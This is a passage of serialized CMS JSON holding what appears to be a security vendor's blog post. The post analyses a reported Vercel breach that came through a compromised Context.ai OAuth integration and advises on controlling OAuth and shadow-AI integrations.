content":24174,"nodeType":879},{},[24175],{"data":24176,"marks":24177,"value":12248,"nodeType":883},{},[],{"data":24179,"content":24180,"nodeType":879},{},[24181],{"data":24182,"marks":24183,"value":12255,"nodeType":883},{},[],{"data":24185,"content":24186,"nodeType":8752},{},[24187,24196],{"data":24188,"content":24189,"nodeType":8766},{},[24190],{"data":24191,"content":24192,"nodeType":879},{},[24193],{"data":24194,"marks":24195,"value":11776,"nodeType":883},{},[],{"data":24197,"content":24198,"nodeType":8766},{},[24199],{"data":24200,"content":24201,"nodeType":879},{},[24202],{"data":24203,"marks":24204,"value":12061,"nodeType":883},{},[],{"data":24206,"content":24207,"nodeType":8752},{},[24208,24217],{"data":24209,"content":24210,"nodeType":8766},{},[24211],{"data":24212,"content":24213,"nodeType":879},{},[24214],{"data":24215,"marks":24216,"value":11799,"nodeType":883},{},[],{"data":24218,"content":24219,"nodeType":8766},{},[24220],{"data":24221,"content":24222,"nodeType":879},{},[24223],{"data":24224,"marks":24225,"value":12298,"nodeType":883},{},[],{"data":24227,"content":24228,"nodeType":8752},{},[24229,24238],{"data":24230,"content":24231,"nodeType":8766},{},[24232],{"data":24233,"content":24234,"nodeType":879},{},[24235],{"data":24236,"marks":24237,"value":11822,"nodeType":883},{},[],{"data":24239,"content":24240,"nodeType":8766},{},[24241],{"data":24242,"content":24243,"nodeType":879},{},[24244],{"data":24245,"marks":24246,"value":12320,"nodeType":883},{},[],{"data":24248,"content":24249,"nodeType":1036},{},[24250],{"data":24251,"marks":24252,"value":12327,"nodeType":883},{},[],{"data":24254,"content":24255,"nodeType":8845},{},[24256,24279,24300,24321,24342,24369,24390,24411],{"data":24257,"content":24258,"nodeType":8752},{},[24259,24269],{"data":24260,"content":24261,"nodeType":8766},{},[24262],{"data":24263,"content":24264,"nodeType":879},{},[24265],{"data":24266,"marks":24267,"value":11606,"nodeType":883},{},[24268],{"type":916},{"data":24270,"content":24271,"nodeType":8766},{},[24272],{"data":24273,"content":24274,"nodeType":879},{},[24275],{"data":24276,"marks":24277,"value":12354,"nodeType":883},{},[24278],{"type":916},{"data":24280,"content":24281,"nodeType":8752},{},[24282,24291],{"data":24283,"content":24284,"nodeType":8766},{},[24285],{"data":24286,"content":24287,"nodeType":879},{},[24288],{"data":24289,"marks":24290,"value":11132,"nodeType":883},{},[],{"data":24292,"content":24293,"nodeType":8766},{},[24294],{"data":24295,"content":24296,"nodeType":879},{},[24297],{"data":24298,"marks":24299,"value":12376,"nodeType":883},{},[],{"data":24301,"content":24302,"nodeType":8752},{},[24303,24312],{"data":24304,"content":24305,"nodeType":8766},{},[24306],{"data":24307,"content":24308,"nodeType":879},{},[24309],{"data":24310,"marks":24311,"value":11658,"nodeType":883},{},[],{"data":24313,"content":24314,"nodeType":8766},{},[24315],{"data":24316,"content":24317,"nodeType":879},{},[24318],{"data":24319,"marks":24320,"value":12398,"nodeType":883},{},[],{"data":24322,"content":24323,"nodeType":8752},{},[24324,24333],{"data":24325,"content":24326,"nodeType":8766},{},[24327],{"data":24328,"content":24329,"nodeType":879},{},[24330],{"data":24331,"marks":24332,"value":11681,"nodeType":883},{},[],{"data":24334,"content":24335,"nodeType":8766},{},[24336],{"data":24337,"content":24338,"nodeType":879},{},[24339],{"data":24340,"marks":24341,"value":12420,"nodeType":883},{},[],{"data":24343,"content":24344,"nodeType":8752},{},[24345,24354],{"data":24346,"content":24347,"nodeType":8766},{},[24348],{"data":24349,"content":24350,"nodeType":879},{},[24351],{"data":24352,"marks":24353,"value":11732,"nodeType":883},{},[],{"data":24355,"content":24356,"nodeType":8766},{},[24357,24363],{"data":24358,"content":24359,"nodeType":879},{},[24360],{"data":24361,"marks":24362,"value":12442,"nodeType":883},{},[],{"data":24364,"content":24365,"nodeType":879},{},[24366],{"data":24367,"marks":24368,"value":12449,"nodeType":883},{},[],{"data":24370,"content":24371,"nodeType":8752},{},[24372,24381],{"data":24373,"content":24374,"nodeType":8766},{},[24375],{"data":24376,"content":24377,"nodeType":879},{},[24378],{"data":24379,"marks":24380,"value":11776,"nodeType":883},{},[],{"data":24382,"content":24383,"nodeType":8766},{},[24384],{"data":24385,"content":24386,"nodeType":879},{},[24387],{"data":24388,"marks":24389,"value":11786,"nodeType":883},{},[],{"data":24391,"content":24392,"nodeType":8752},{},[24393,24402],{"data":24394,"content":24395,"nodeType":8766},{},[24396],{"data":24397,"content":24398,"nodeType":879},{},[24399],{"data":24400,"marks":24401,"value":11799,"nodeType":883},{},[],{"data":24403,"content":24404,"nodeType":8766},{},[24405],{"data":24406,"content":24407,"nodeType":879},{},[24408],{"data":24409,"marks":24410,"value":12298,"nodeType":883},{},[],{"data":24412,"content":24413,"nodeType":8752},{},[24414,24423],{"data":24415,"content":24416,"nodeType":8766},{},[24417],{"data":24418,"content":24419,"nodeType":879},{},[24420],{"data":24421,"marks":24422,"value":11822,"nodeType":883},{},[],{"data":24424,"content":24425,"nodeType":8766},{},[24426],{"data":24427,"content":24428,"nodeType":879},{},[24429],{"data":24430,"marks":24431,"value":12320,"nodeType":883},{},[],{"data":24433,"content":24434,"nodeType":905},{},[],{"data":24436,"content":24437,"nodeType":909},{},[24438],{"data":24439,"marks":24440,"value":12523,"nodeType":883},{},[24441],{"type":916},{"data":24443,"content":24444,"nodeType":879},{},[24445],{"data":24446,"marks":24447,"value":12530,"nodeType":883},{},[],{"data":24449,"content":24450,"nodeType":879},{},[24451],{"data":24452,"marks":24453,"value":12537,"nodeType":883},{},[],{"data":24455,"content":24456,"nodeType":879},{},[24457,24461],{"data":24458,"marks":24459,"value":12545,"nodeType":883},{},[24460],{"type":916},{"data":24462,"marks":24463,"value":12549,"nodeType":883},{},[],{"data":24465,"content":24466,"nodeType":905},{},[],{"data":24468,"content":24469,"nodeType":909},{},[24470],{"data":24471,"marks":24472,"value":8696,"nodeType":883},{},[24473],{"type":916},{"data":24475,"content":24476,"nodeType":879},{},[24477,24480,24486],{"data":24478,"marks":24479,"value":12566,"nodeType":883},{},[],{"data":24481,"content":24482,"nodeType":940},{"uri":8706},[24483],{"data":24484,"marks":24485,"value":8711,"nodeType":883},{},[],{"data":24487,"marks":24488,"value":12576,"nodeType":883},{},[],{"data":24490,"content":24491,"nodeType":879},{},[24492,24495,24501],{"data":24493,"marks":24494,"value":21,"nodeType":883},{},[],{"data":24496,"content":24497,"nodeType":940},{"uri":12585},[24498],{"data":24499,"marks":24500,"value":12590,"nodeType":883},{},[],{"data":24502,"marks":24503,"value":21,"nodeType":883},{},[],{"data":24505,"content":24506,"nodeType":879},{},[24507],{"data":24508,"marks":24509,"value":8654,"nodeType":883},{},[24510],{"type":916},{"data":24512,"content":24513,"nodeType":905},{},[],{"data":24515,"content":24516,"nodeType":909},{},[24517],{"data":24518,"marks":24519,"value":12611,"nodeType":883},{},[24520],{"type":916},{"data":24522,"content":24523,"nodeType":879},{},[24524,24527,24533],{"data":24525,"marks":24526,"value":12618,"nodeType":883},{},[],{"data":24528,"content":24529,"nodeType":940},{"uri":4772},[24530],{"data":24531,"marks":24532,"value":6679,"nodeType":883},{},[],{"data":24534,"marks":24535,"value":6683,"nodeType":883},{},[],{"items":24537},[24538,24540],{"sys":24539,"name":3273},{"id":3272},{"sys":24541,"name":343},{"id":3276},{"items":24543},[24544],{"fullName":12641,"firstName":12642,"jobTitle":868,"profilePicture":24545},{"url":12644},{"__typename":1967,"sys":24547,"content":24549,"title":25289,"synopsis":25290,"hashTags":59,"publishedDate":25291,"slug":25292,"tagsCollection":25293,"authorsCollection":25299},{"id":24548},"Lq2AFQ8VG2rMEe4h2CYuH",{"json":24550},{"data":24551,"content":24552,"nodeType":875},{},[24553,24580,24611,24618,24624,24627,24635,24642,24648,24667,24674,24682,24702,24718,24725,24732,24735,24743,24750,24757,24820,24827,24835,24847,24854,24861,24867,24875,24882,24889,24896,24903,24909,24917,24924,25009,25015,25018,25026,25033,25049,25056,25063,25069,25088,25091,25098,25105,25111,25129,25136,25143,25149,25152,25159,25166,25173,25179,25186,25192,25198,25223,25229,25241,25248,25255],{"data":24554,"content":24555,"nodeType":879},{},[24556,24560,24568,24572,24577],{"data":24557,"marks":24558,"value":24559,"nodeType":883},{},[],"This week, a user going by the name of “ShinyHunters” (though allegedly not ",{"data":24561,"content":24562,"nodeType":940},{"uri":7618},[24563],{"data":24564,"marks":24565,"value":24567,"nodeType":883},{},[24566],{"type":948},"actual ShinyHunters",{"data":24569,"marks":24570,"value":24571,"nodeType":883},{},[],", but someone imitating them in an attempt to trade off their credibility) posted on a breach forum claiming access keys, source code, and database data stolen from cloud development platform provider ",{"data":24573,"marks":24574,"value":24576,"nodeType":883},{},[24575],{"type":916},"Vercel",{"data":24578,"marks":24579,"value":3386,"nodeType":883},{},[],{"data":24581,"content":24582,"nodeType":879},{},[24583,24587,24596,24600,24608],{"data":24584,"marks":24585,"value":24586,"nodeType":883},{},[],"This happened because a Vercel employee had connected an AI app, Context.ai, into their Google Workspace tenant. When Context.ai was compromised — ",{"data":24588,"content":24590,"nodeType":940},{"uri":24589},"https:\u002F\u002Fwww.infostealers.com\u002Farticle\u002Fbreaking-vercel-breach-linked-to-infostealer-infection-at-context-ai\u002F",[24591],{"data":24592,"marks":24593,"value":24595,"nodeType":883},{},[24594],{"type":948},"allegedly the result of an infostealer infection from an employee searching for Roblox cheats",{"data":24597,"marks":24598,"value":24599,"nodeType":883},{},[]," — the attacker was able to leverage OAuth tokens stored in Context.ai’s Supabase platform to access downstream customer accounts (pointing to a heavily permissioned victim, probably a developer, possibly even a ",{"data":24601,"content":24602,"nodeType":940},{"uri":1679},[24603],{"data":24604,"marks":24605,"value":24607,"nodeType":883},{},[24606],{"type":948},"personal device with access to corp credentials",{"data":24609,"marks":24610,"value":1087,"nodeType":883},{},[],{"data":24612,"content":24613,"nodeType":879},{},[24614],{"data":24615,"marks":24616,"value":24617,"nodeType":883},{},[],"This access included a Vercel employee’s Google Workspace account. This particular user had significant access to data and secrets in Vercel’s systems, including internal dashboards, employee records, API keys, NPM tokens, and GitHub tokens, which the attacker was able to exfiltrate, holding Vercel to ransom for $2 million. ",{"data":24619,"content":24623,"nodeType":971},{"target":24620},{"sys":24621},{"id":24622,"type":976,"linkType":977},"6Ft8aSnzfYVZ7j57mYeXgQ",[],{"data":24625,"content":24626,"nodeType":905},{},[],{"data":24628,"content":24629,"nodeType":909},{},[24630],{"data":24631,"marks":24632,"value":24634,"nodeType":883},{},[24633],{"type":916},"How did this happen, and what could have stopped it?",{"data":24636,"content":24637,"nodeType":879},{},[24638],{"data":24639,"marks":24640,"value":24641,"nodeType":883},{},[],"From Vercel’s perspective, this attack could have been avoided had their employees been blocked from adding new OAuth integrations without admin approval (a toggle in their Google admin panel, and an essential control in a well-configured environment). Or, if the integration had been flagged in a routine audit and removed. ",{"data":24643,"content":24647,"nodeType":971},{"target":24644},{"sys":24645},{"id":24646,"type":976,"linkType":977},"b5HFvY1m6RnuXL3a95jVt",[],{"data":24649,"content":24650,"nodeType":879},{},[24651,24655,24663],{"data":24652,"marks":24653,"value":24654,"nodeType":883},{},[],"It probably should have been removed, too. The particular OAuth app that was connected into the environment was a deprecated “AI Office Suite” product intended for consumer use. ",{"data":24656,"content":24658,"nodeType":940},{"uri":24657},"https:\u002F\u002Fcontext.ai\u002Fsecurity-update",[24659],{"data":24660,"marks":24661,"value":24662,"nodeType":883},{},[],"According to Context.ai",{"data":24664,"marks":24665,"value":24666,"nodeType":883},{},[],", Vercel aren’t even a registered customer — adding more evidence that this was probably the result of a self-service trial that was subsequently forgotten about. That consumer product has also since been replaced by an enterprise product. But for whatever reason, the access hadn’t been revoked (from either side). ",{"data":24668,"content":24669,"nodeType":879},{},[24670],{"data":24671,"marks":24672,"value":24673,"nodeType":883},{},[],"The elephant in the room is that Context.ai is an AI app. Most organizations are rightly nervous about employees adding unapproved AI SaaS into their environment. Having employees use shadow AI in the form of LLMs is one thing — users uploading sensitive data to unapproved apps or external tenants being the key concern. But OAuth grants are even more dangerous. Because if that app or vendor is compromised, the apps and accounts you’ve integrated it with are also at risk — which is what was exploited here. ",{"data":24675,"content":24676,"nodeType":1036},{},[24677],{"data":24678,"marks":24679,"value":24681,"nodeType":883},{},[24680],{"type":916},"Where’s the fault?",{"data":24683,"content":24684,"nodeType":879},{},[24685,24689,24698],{"data":24686,"marks":24687,"value":24688,"nodeType":883},{},[],"It’s easy to point fingers here. There are multiple control gaps and failures for both parties. Vercel should have disabled OAuth grants without admin approval, and regularly audited the connections in their environment. From a vendor's perspective, they could have also default applied a control that ",{"data":24690,"content":24692,"nodeType":940},{"uri":24691},"https:\u002F\u002Fvercel.com\u002Fkb\u002Fbulletin\u002Fvercel-april-2026-security-incident",[24693],{"data":24694,"marks":24695,"value":24697,"nodeType":883},{},[24696],{"type":948},"prevents secret environment variables from being read",{"data":24699,"marks":24700,"value":24701,"nodeType":883},{},[]," — which would have significantly reduced the impact to Vercel customers from the data breach. ",{"data":24703,"content":24704,"nodeType":879},{},[24705,24709,24714],{"data":24706,"marks":24707,"value":24708,"nodeType":883},{},[],"Context.ai comes off worse. They could and should have had better separation of accounts and privileges — and if true, their users really shouldn’t be downloading Roblox scripts on devices they use for work access. It’s important to say ",{"data":24710,"marks":24711,"value":24713,"nodeType":883},{},[24712],{"type":891},"if true",{"data":24715,"marks":24716,"value":24717,"nodeType":883},{},[]," here, but the prospect of third parties accessing your environment from insecure devices that they use for gaming is the stuff of nightmares for enterprise security and compliance teams.",{"data":24719,"content":24720,"nodeType":879},{},[24721],{"data":24722,"marks":24723,"value":24724,"nodeType":883},{},[],"You definitely don’t want to be Context.ai in this scenario. The reputational harm could be pretty significant, and is a wake-up call for other SaaS vendors to check that their house is in order. But although Vercel have responded quickly and transparently to the incident, this could only really have happened as a result of technical and procedural control gaps on their end.",{"data":24726,"content":24727,"nodeType":879},{},[24728],{"data":24729,"marks":24730,"value":24731,"nodeType":883},{},[],"It’s worth taking a step back and looking at the bigger picture here — and how these issues might impact your organization too. ",{"data":24733,"content":24734,"nodeType":905},{},[],{"data":24736,"content":24737,"nodeType":909},{},[24738],{"data":24739,"marks":24740,"value":24742,"nodeType":883},{},[24741],{"type":916},"Shadow AI is still just shadow SaaS – but the AI scramble is a force multiplier",{"data":24744,"content":24745,"nodeType":879},{},[24746],{"data":24747,"marks":24748,"value":24749,"nodeType":883},{},[],"Shadow IT, and in particular shadow SaaS, is not a new problem. Most organizations run heavily (or exclusively) on SaaS, accessed in the browser, with hundreds of apps per enterprise. Unmanaged, self-adopted apps have been a thorn in the side of security teams for some time. ",{"data":24751,"content":24752,"nodeType":879},{},[24753],{"data":24754,"marks":24755,"value":24756,"nodeType":883},{},[],"There are essentially four kinds of shadow IT to be wary of in the context of AI apps:",{"data":24758,"content":24759,"nodeType":1531},{},[24760,24775,24790,24805],{"data":24761,"content":24762,"nodeType":1535},{},[24763],{"data":24764,"content":24765,"nodeType":879},{},[24766,24771],{"data":24767,"marks":24768,"value":24770,"nodeType":883},{},[24769],{"type":916},"Shadow apps:",{"data":24772,"marks":24773,"value":24774,"nodeType":883},{},[]," Apps that employees have signed up to and are using for business purposes without business approval. This includes apps signed up to with a corporate account or personal account. ",{"data":24776,"content":24777,"nodeType":1535},{},[24778],{"data":24779,"content":24780,"nodeType":879},{},[24781,24786],{"data":24782,"marks":24783,"value":24785,"nodeType":883},{},[24784],{"type":916},"Shadow tenants:",{"data":24787,"marks":24788,"value":24789,"nodeType":883},{},[]," Apps that employees are accessing with personal accounts, essentially creating shadow tenants outside of your organization’s control — even if you’ve approved the app itself.",{"data":24791,"content":24792,"nodeType":1535},{},[24793],{"data":24794,"content":24795,"nodeType":879},{},[24796,24801],{"data":24797,"marks":24798,"value":24800,"nodeType":883},{},[24799],{"type":916},"Shadow extensions:",{"data":24802,"marks":24803,"value":24804,"nodeType":883},{},[]," Many AI apps come with an extension counterpart, along with countless third-party extensions that are either untrustworthy or downright malicious. Browser extensions add another angle to the equation by presenting visibility beyond the application into browser activity. ",{"data":24806,"content":24807,"nodeType":1535},{},[24808],{"data":24809,"content":24810,"nodeType":879},{},[24811,24816],{"data":24812,"marks":24813,"value":24815,"nodeType":883},{},[24814],{"type":916},"Shadow integrations:",{"data":24817,"marks":24818,"value":24819,"nodeType":883},{},[]," OAuth connections across apps that aren’t known or approved. Even if an app itself is approved, plugging that app directly into your primary enterprise apps — with all the sensitive data and functionality therein — isn't necessarily also approved.  ",{"data":24821,"content":24822,"nodeType":879},{},[24823],{"data":24824,"marks":24825,"value":24826,"nodeType":883},{},[],"In the Vercel case, we’re talking specifically about shadow integrations. But all of these present a key risk to your organization. ",{"data":24828,"content":24829,"nodeType":1036},{},[24830],{"data":24831,"marks":24832,"value":24834,"nodeType":883},{},[24833],{"type":916},"The web of OAuth sprawl spans way beyond Google and Microsoft ",{"data":24836,"content":24837,"nodeType":879},{},[24838,24843],{"data":24839,"marks":24840,"value":24842,"nodeType":883},{},[24841],{"type":916},"On average we see 17 unique AI app integrations per organization in Microsoft and Google alone",{"data":24844,"marks":24845,"value":24846,"nodeType":883},{},[],". If you consider that most organizations have probably approved 1 or 2 max for business use, and may have approved none at all for app-to-app OAuth connectivity, that’s quite a significant difference. ",{"data":24848,"content":24849,"nodeType":879},{},[24850],{"data":24851,"marks":24852,"value":24853,"nodeType":883},{},[],"The number of connections outside of these core platforms is significantly higher. Just think how the typical AI app operates. If you want it to be able to effectively automate workflows — pull data from one app, aggregate and analyze it in another, present that information in a report, dashboard, or presentation, and then distribute it — that’s a fair few integrations in just one workflow. MCP connections use OAuth to achieve this interconnectivity in the same way as any other SaaS app.",{"data":24855,"content":24856,"nodeType":879},{},[24857],{"data":24858,"marks":24859,"value":24860,"nodeType":883},{},[],"We used to talk about automation apps like Zapier as being a goldmine for attackers. Well, AI apps are on their way to being even more interconnected, more frequently used, and more flexible in terms of how attackers can abuse them. ",{"data":24862,"content":24866,"nodeType":971},{"target":24863},{"sys":24864},{"id":24865,"type":976,"linkType":977},"4FiWyVw7mpVBA5uBVJoOKL",[],{"data":24868,"content":24869,"nodeType":1036},{},[24870],{"data":24871,"marks":24872,"value":24874,"nodeType":883},{},[24873],{"type":916},"A note on OAuth configuration complexity",{"data":24876,"content":24877,"nodeType":879},{},[24878],{"data":24879,"marks":24880,"value":24881,"nodeType":883},{},[],"A common misconception is that when a regular user consents to an OAuth app (let's use Google Workspace as the example) the app only gets access to the things they can directly access. Technically that's true — the access is scoped to that user's permissions. But in practice, the blast radius is almost always bigger than people think.",{"data":24883,"content":24884,"nodeType":879},{},[24885],{"data":24886,"marks":24887,"value":24888,"nodeType":883},{},[],"The scope includes shared drives, shared calendars, documents shared with them, and any other collaborative resources. A single well-permissioned user (think: developer with access to secrets, dashboards, and internal tooling) is more than enough to cause serious damage through a single OAuth grant. ",{"data":24890,"content":24891,"nodeType":879},{},[24892],{"data":24893,"marks":24894,"value":24895,"nodeType":883},{},[],"The scopes themselves are often deceptively broad. An app requesting https:\u002F\u002Fwww.googleapis.com\u002Fauth\u002Fdrive gets full read\u002Fwrite access to everything the user can see in Drive — not just their personal files. And the blast radius is further contingent on the data and user permission hygiene in these broader environments. ",{"data":24897,"content":24898,"nodeType":879},{},[24899],{"data":24900,"marks":24901,"value":24902,"nodeType":883},{},[],"So if your environment hasn't got cleanly separated access and permissions for different users and groups, an attacker compromising a \"normal\" user account can end up with extensive access. You don't need tenant-wide admin access when a normal user's access already spans the crown jewels.",{"data":24904,"content":24908,"nodeType":971},{"target":24905},{"sys":24906},{"id":24907,"type":976,"linkType":977},"2t81AnAHx2On3fBynM4vVe",[],{"data":24910,"content":24911,"nodeType":1036},{},[24912],{"data":24913,"marks":24914,"value":24916,"nodeType":883},{},[24915],{"type":916},"Unsurprisingly, OAuth breaches are stacking up",{"data":24918,"content":24919,"nodeType":879},{},[24920],{"data":24921,"marks":24922,"value":24923,"nodeType":883},{},[],"Widespread OAuth interconnectedness isn’t just an AI app problem. Attackers have been exploiting this for some time:",{"data":24925,"content":24926,"nodeType":1531},{},[24927,24973],{"data":24928,"content":24929,"nodeType":1535},{},[24930],{"data":24931,"content":24932,"nodeType":879},{},[24933,24937,24944,24948,24956,24960,24969],{"data":24934,"marks":24935,"value":24936,"nodeType":883},{},[],"In 2025, ",{"data":24938,"content":24939,"nodeType":940},{"uri":7618},[24940],{"data":24941,"marks":24942,"value":2006,"nodeType":883},{},[24943],{"type":948},{"data":24945,"marks":24946,"value":24947,"nodeType":883},{},[]," launched OAuth-driven supply chain attacks against Salesforce and Google Workspace tenants after breaching Salesloft (specifically the ",{"data":24949,"content":24950,"nodeType":940},{"uri":17130},[24951],{"data":24952,"marks":24953,"value":24955,"nodeType":883},{},[24954],{"type":948},"Salesloft Drift",{"data":24957,"marks":24958,"value":24959,"nodeType":883},{},[]," platform) and ",{"data":24961,"content":24963,"nodeType":940},{"uri":24962},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fsalesforce-investigates-customer-data-theft-via-gainsight-breach\u002F",[24964],{"data":24965,"marks":24966,"value":24968,"nodeType":883},{},[24967],{"type":948},"Gainsight",{"data":24970,"marks":24971,"value":24972,"nodeType":883},{},[],". In total, over 1000 organizations were impacted, including Google, Cloudflare, Rubrik, Elastic, Proofpoint, JFrog, Zscaler, Tenable, Palo Alto Networks, CyberArk, BeyondTrust, Qualys, and many more, with over 1.5B records stolen. ",{"data":24974,"content":24975,"nodeType":1535},{},[24976],{"data":24977,"content":24978,"nodeType":879},{},[24979,24983,24992,24996,25005],{"data":24980,"marks":24981,"value":24982,"nodeType":883},{},[],"More recently, Snowflake customers were impacted after a ",{"data":24984,"content":24986,"nodeType":940},{"uri":24985},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fsnowflake-customers-hit-in-data-theft-attacks-after-saas-integrator-breach\u002F",[24987],{"data":24988,"marks":24989,"value":24991,"nodeType":883},{},[24990],{"type":948},"breach at data anomaly detection company Anodot",{"data":24993,"marks":24994,"value":24995,"nodeType":883},{},[]," where the attacker attempted to leverage the stolen authentication tokens to access Salesforce data, with ",{"data":24997,"content":24999,"nodeType":940},{"uri":24998},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fstolen-rockstar-games-analytics-data-leaked-by-extortion-gang\u002F",[25000],{"data":25001,"marks":25002,"value":25004,"nodeType":883},{},[25003],{"type":948},"Rockstar",{"data":25006,"marks":25007,"value":25008,"nodeType":883},{},[]," a high-profile victim of the breach (again linked to Scattered Lapsus$ Hunters). ",{"data":25010,"content":25014,"nodeType":971},{"target":25011},{"sys":25012},{"id":25013,"type":976,"linkType":977},"3oqoL9L3fxetFcIhnfQhMQ",[],{"data":25016,"content":25017,"nodeType":905},{},[],{"data":25019,"content":25020,"nodeType":909},{},[25021],{"data":25022,"marks":25023,"value":25025,"nodeType":883},{},[25024],{"type":916},"Infostealers continue to drive corporate breaches",{"data":25027,"content":25028,"nodeType":879},{},[25029],{"data":25030,"marks":25031,"value":25032,"nodeType":883},{},[],"While unverified, Hudson Rock’s case for an infostealer breach being the root cause of the Context.ai breach seems believable. Infostealer infections have been one of the leading security threats for some time, fuelling breaches powered by stolen credentials and session tokens.",{"data":25034,"content":25035,"nodeType":879},{},[25036,25040,25045],{"data":25037,"marks":25038,"value":25039,"nodeType":883},{},[],"With the assumed rise in MFA coverage, it’s often surprising to security teams that stolen credentials are still a problem. ",{"data":25041,"marks":25042,"value":25044,"nodeType":883},{},[25043],{"type":916},"But of the last million logins we saw, 1 in 4 were password logins (not SSO), 2 in 5 were not protected by MFA, and 1 in 5 used a weak, breached, or reused password. ",{"data":25046,"marks":25047,"value":25048,"nodeType":883},{},[],"Plenty of scope for abuse. ",{"data":25050,"content":25051,"nodeType":879},{},[25052],{"data":25053,"marks":25054,"value":25055,"nodeType":883},{},[],"Stolen session tokens are even more valuable to attackers, enabling them to bypass authentication controls by replaying the token in their own browser. In theory, they should only be valid for a limited timeframe, but in practice this can be as many as 90 days, and sometimes indefinite. ",{"data":25057,"content":25058,"nodeType":879},{},[25059],{"data":25060,"marks":25061,"value":25062,"nodeType":883},{},[],"In this case, it seems likely that the compromised device was a developer machine (given the access to Supabase), or potentially even a personal device (given they were installing Roblox cheats…). This is relevant because these personal, developer, and BYOD machines are often less secure — developer machines are often exempt from EDR monitoring or significantly tuned-down (too noisy), while personal devices naturally lack enterprise security software.",{"data":25064,"content":25068,"nodeType":971},{"target":25065},{"sys":25066},{"id":25067,"type":976,"linkType":977},"139oaGgwRKZbwJzyex9LA5",[],{"data":25070,"content":25071,"nodeType":879},{},[25072,25076,25084],{"data":25073,"marks":25074,"value":25075,"nodeType":883},{},[],"We’ve also seen an uptick in developer-oriented phishing and malvertising campaigns. The ",{"data":25077,"content":25078,"nodeType":940},{"uri":7409},[25079],{"data":25080,"marks":25081,"value":25083,"nodeType":883},{},[25082],{"type":948},"InstallFix campaign",{"data":25085,"marks":25086,"value":25087,"nodeType":883},{},[]," we identified, intercepting users as they attempt to install AI tools like Claude Code and NotebookLM, is an example of this — and also another way that attackers are capitalizing on AI hype. ",{"data":25089,"content":25090,"nodeType":905},{},[],{"data":25092,"content":25093,"nodeType":909},{},[25094],{"data":25095,"marks":25096,"value":6542,"nodeType":883},{},[25097],{"type":916},{"data":25099,"content":25100,"nodeType":879},{},[25101],{"data":25102,"marks":25103,"value":25104,"nodeType":883},{},[],"There are some immediate next steps that we’ll quickly summarize here, as they've already been covered in wider reporting. If you’re a Vercel customer, you should urgently rotate every credential stored as a non-sensitive variable that could have been exposed, enable the sensitive variable feature toggle, and monitor your account for anomalous activity. And if you’re using the specific Context.ai integration, you need to revoke it ASAP and begin a full audit of the connected accounts, both inside Workspace and broader connected apps (this isn’t that easy, as we’ll highlight in a moment). ",{"data":25106,"content":25110,"nodeType":971},{"target":25107},{"sys":25108},{"id":25109,"type":976,"linkType":977},"76HViirkH2R4QAzWg605sv",[],{"data":25112,"content":25113,"nodeType":879},{},[25114,25118,25126],{"data":25115,"marks":25116,"value":25117,"nodeType":883},{},[],"Taking a step back, organizations really need to get their arms around OAuth integrations in their environment. A default-deny approach to allowing users to consent to new integrations, and routinely auditing the ones already in your environment to ensure they’re still definitely required, is essential. Each integration expands your attack surface and could potentially grant an attacker extensive access to your environment. This default-deny approach isn't exactly a new concept for security teams and is the same in principle as what we recently advised for ",{"data":25119,"content":25120,"nodeType":940},{"uri":1452},[25121],{"data":25122,"marks":25123,"value":25125,"nodeType":883},{},[25124],{"type":948},"browser extension management",{"data":25127,"marks":25128,"value":3386,"nodeType":883},{},[],{"data":25130,"content":25131,"nodeType":879},{},[25132],{"data":25133,"marks":25134,"value":25135,"nodeType":883},{},[],"This is fairly straightforward in your main enterprise cloud environment (think M365 or Google Workspace). But doing it across every SaaS app that allows some level of OAuth integration with another (i.e. every SaaS app) is somewhat harder. Not only do you need to have a comprehensive and up-to-date inventory, you need to be an app admin for every app (not always the case for self-adopted apps) and the particular app needs to give you the control to restrict and remove OAuth grants on behalf of users in your tenant. ",{"data":25137,"content":25138,"nodeType":879},{},[25139],{"data":25140,"marks":25141,"value":25142,"nodeType":883},{},[],"Again, this is not exclusively a Shadow AI problem, even if AI adoption is contributing significantly to the sprawl. ",{"data":25144,"content":25148,"nodeType":971},{"target":25145},{"sys":25146},{"id":25147,"type":976,"linkType":977},"XKKHUiz56G82uwYhbv2Qv",[],{"data":25150,"content":25151,"nodeType":905},{},[],{"data":25153,"content":25154,"nodeType":909},{},[25155],{"data":25156,"marks":25157,"value":17585,"nodeType":883},{},[25158],{"type":916},{"data":25160,"content":25161,"nodeType":879},{},[25162],{"data":25163,"marks":25164,"value":25165,"nodeType":883},{},[],"As we’ve established, there are quite a few pieces to this puzzle. Push can help with all of them. ",{"data":25167,"content":25168,"nodeType":879},{},[25169],{"data":25170,"marks":25171,"value":25172,"nodeType":883},{},[],"Push observes every app login your employees make in their browser, building a comprehensive picture of SaaS and AI use across your organization. This includes how they’re logging in and how secure the login is: did it have MFA, what kind of MFA, was it using a weak or compromised password, did they use SSO, and so on. ",{"data":25174,"content":25178,"nodeType":971},{"target":25175},{"sys":25176},{"id":25177,"type":976,"linkType":977},"2B205bUaLm6vG8mIQ0rJvA",[],{"data":25180,"content":25181,"nodeType":879},{},[25182],{"data":25183,"marks":25184,"value":25185,"nodeType":883},{},[],"Push also tracks OAuth integrations in your environment and gives you the ability to manage and remove them in core environments like M365 and Google Workspace, providing a single platform for you to view, manage, and secure app use across your organization. ",{"data":25187,"content":25191,"nodeType":971},{"target":25188},{"sys":25189},{"id":25190,"type":976,"linkType":977},"eEbdBUfyzZsdIOjFOXHpM",[],{"data":25193,"content":25197,"nodeType":971},{"target":25194},{"sys":25195},{"id":25196,"type":976,"linkType":977},"1MTFxfROuGKxnkHQwWHe8K",[],{"data":25199,"content":25200,"nodeType":879},{},[25201,25205,25210,25214,25219],{"data":25202,"marks":25203,"value":25204,"nodeType":883},{},[],"This makes it easy to surface both vulnerabilities and possible control gaps, and do something about them. But where Push really excels is in the ability to observe and block OAuth connection requests ",{"data":25206,"marks":25207,"value":25209,"nodeType":883},{},[25208],{"type":916},"even outside of your primary enterprise apps.",{"data":25211,"marks":25212,"value":25213,"nodeType":883},{},[]," Using Push, you can detect and block OAuth integration requests as they traverse the browser. This ",{"data":25215,"marks":25216,"value":25218,"nodeType":883},{},[25217],{"type":916},"app-agnostic",{"data":25220,"marks":25221,"value":25222,"nodeType":883},{},[]," level of control is absolutely critical to halting OAuth integration sprawl. 